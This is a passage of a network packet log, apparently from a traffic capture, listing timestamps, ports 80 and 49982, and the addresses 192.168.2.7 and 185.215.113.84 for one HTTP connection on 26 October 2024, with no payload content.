Oct 26, 2024 07:27:23.342257977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342259884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342272997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342277050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342284918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342298031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342298985 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342310905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342324018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342324972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342343092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342355013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342374086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342389107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342395067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342402935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342428923 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342432022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342442989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342449903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342453003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342466116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342472076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342489004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342509031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342791080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342818975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342828989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342849970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342861891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342884064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342886925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342906952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342917919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342928886 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342928886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342942953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342943907 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342967033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342972040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.342979908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.342991114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343009949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343034029 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343064070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343075991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343086004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343100071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343111038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343116045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343135118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343137980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343147993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343158007 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343161106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343173027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343183041 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343209982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343221903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343257904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343266010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343276978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343291044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343296051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343308926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343328953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343328953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343339920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343346119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343360901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343380928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343381882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343393087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343401909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343406916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343420029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343421936 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343436956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343441010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343451023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343460083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343463898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343477964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343487024 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343506098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343528032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343539953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343552113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343581915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343585014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343595028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343607903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343619108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343626022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343645096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343663931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343671083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343677998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343700886 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343702078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343718052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343722105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343735933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343741894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343753099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343753099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343766928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.343776941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343796968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.343815088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.383691072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.383704901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.383716106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.383748055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.383769035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.383802891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.383815050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.383841991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.383867979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394431114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394443989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394468069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394484043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394486904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394496918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394501925 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394510031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394525051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394532919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394537926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394552946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394558907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394576073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394581079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394587994 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394598961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394603968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394609928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394623041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.394627094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394654036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.394670963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.397922039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.397933960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.397943974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.397955894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.397967100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.397994041 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.398017883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.398032904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.398046970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.398060083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.398075104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.398077965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.398082018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.398097038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.398097992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.398113012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.398122072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.398135900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.398145914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413286924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413337946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413438082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413449049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413455963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413464069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413475037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413492918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413502932 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413505077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413522959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413530111 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413533926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413544893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413546085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413561106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413578033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413580894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413589954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413600922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413605928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413620949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413628101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413640022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413650036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413650036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413665056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413667917 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413681984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413687944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413701057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413702965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413722992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413728952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413738012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413743973 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413750887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413759947 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413772106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413774014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413784981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413786888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413798094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413804054 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413810968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413811922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413819075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413825989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413840055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413846016 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413852930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413866997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413873911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413883924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413892984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413897038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413911104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413918018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413927078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.413929939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413957119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.413981915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414063931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414076090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414088011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414099932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414103985 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414112091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414120913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414158106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414158106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414170980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414248943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414252996 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414271116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414285898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414288998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414300919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414309025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414313078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414324999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414330006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414336920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414347887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414349079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414360046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414366007 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414371967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414390087 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414419889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414900064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414911985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414921999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.414932013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414943933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.414968967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415117025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415128946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415138960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415149927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415153027 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415162086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415173054 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415180922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415184975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415196896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415205002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415209055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415220022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415221930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415231943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415235996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415247917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415258884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.415260077 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415287971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.415301085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.418353081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.418368101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.418385029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.418395996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.418406963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.418417931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.418417931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.418418884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.418417931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.418432951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.418458939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.419003010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.419015884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.419028044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.419048071 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.419060946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.457864046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457896948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457910061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457915068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.457921982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457931995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.457935095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457943916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.457957029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457966089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.457969904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457979918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.457988024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.457990885 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458003044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458013058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458014965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458019018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458036900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458053112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458055019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458065033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458076954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458089113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458091021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458102942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458105087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458116055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458123922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458132029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458141088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458149910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458162069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458168030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458175898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458188057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:23.458199978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458210945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:23.458214998 CEST	49982	80	192.168.2.7	185.215.113.84
